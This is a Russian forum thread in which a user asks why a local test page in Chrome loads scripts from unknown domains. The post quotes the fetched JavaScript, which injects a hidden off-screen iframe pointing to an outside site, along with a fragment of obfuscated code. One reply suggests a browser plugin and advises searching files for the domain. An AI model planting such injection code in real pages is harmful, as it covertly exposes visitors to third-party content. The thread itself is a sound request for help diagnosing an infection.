Скрипт выполняется без уведомления, что это ? - Безопасность, Шифрование

pompiduskus · 19.02.2013, 01:33

Всем привет.

Я не хакер, и не понимаю что тут происходит. Помогите.

Сижу в гугле хроме, с открытым окном для разработчиков (f12).

Открываю страницу на локальном сервере которая содержит одну функцию по изменению цвета у текста.

И тут вдруг, в консоли происходят странные действия.
Появляется следующий текст:

Цитата:

Resource interpreted as Script but transferred with MIME type text/html: "http://loogle.in/c.php?r=0.5421522960532457&d=www.te st_site.com". script.js:11

Resource interpreted as Script but transferred with MIME type text/html: "http://protectionconversation.biz/b/3116011022/http%3A//www.test_site.com/move.html". 31601104-online-k1no.ru.js:1

Resource interpreted as Script but transferred with MIME type text/html: "http://s.sticky-lazy.biz/EDV/38160110979/".move.html:1

С начала я вообще не обратил внимания на это, но потом заметил адрес,
loogle.in

Если перейти на этот сайт, отказано в доступе, но если открыть вот по такой ссылке, loogle.in/c.php открывается JS со следующим содержанием.

Цитата:

if (document.referrer == ""){ var f = document.createElement('iframe'); f.setAttribute("id", "newdiv1"); f.setAttribute("src", "http://online-k1no.ru/"); f.setAttribute("style", "position: absolute; top: -1000px; width: 100%; z-index: 10000; height: 100%;"); document.body.appendChild(f); //document.body.style.overflow = "hidden"; setTimeout(function(){ //document.getElementById("newdiv1"). style.top = "-1000px"; //document.body.style.overflow = "auto"; }, 15000); }

И в конце получается что это воздействие сайта online-k1no.ru/ если я всё правильно понял.

Если перейти по адресу s.sticky-lazy.biz/EDV/38160110979/
там находится вот такой JS

Цитата:

if(window != window.top){}else{ }

Далее, переход по вот этой ссылке выводит
"http://protectionconversation.biz/b/3116011022/http%3A//www.test_site.com/move_item_before_cursor.html".

Код:

function gNJl(EP){var RgShc=EP+"=";var CT=0;while(CT')}else{ document.write('');}

Что это вообще такое, и как от этого избавиться

Stilet · 19.02.2013, 09:27

У меня такое впечатление что хром сам к себе обращается, или его плуги к нему обращаются таким образом. Дедовский способ - зарядить поиск по внутренностям файлов на строку loogle и посмотреть в каком она зашита.

pompiduskus · 22.02.2013, 00:16

спасибо. попробую

19.02.2013, 09:27	#2
Stilet Белик Виталий :) Старожил Регистрация: 23.07.2007 Сообщений: 57,097	У меня такое впечатление что хром сам к себе обращается, или его плуги к нему обращаются таким образом. Дедовский способ - зарядить поиск по внутренностям файлов на строку loogle и посмотреть в каком она зашита. I'm learning to live...

22.02.2013, 00:16	#3
pompiduskus юзер как все Участник клуба Регистрация: 10.01.2012 Сообщений: 1,586	спасибо. попробую <Дзен - Вся вселенная в тебе > \| Резюме: https://ch3ll0v3k.github.io/CV/

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Total Commander копирование файлов без уведомления	Ecosasha	Софт	2	28.04.2011 20:44
Эквалайзер...что это? кто это? Можно ли с ним подружиться?	.Phoenix	Мультимедиа в Delphi	45	08.04.2010 23:37
Скрипт выполняется только один раз	MAKSA	JavaScript, Ajax	6	12.02.2010 13:48
Не выполняется PHP скрипт	xxxholic	PHP	2	13.12.2009 12:56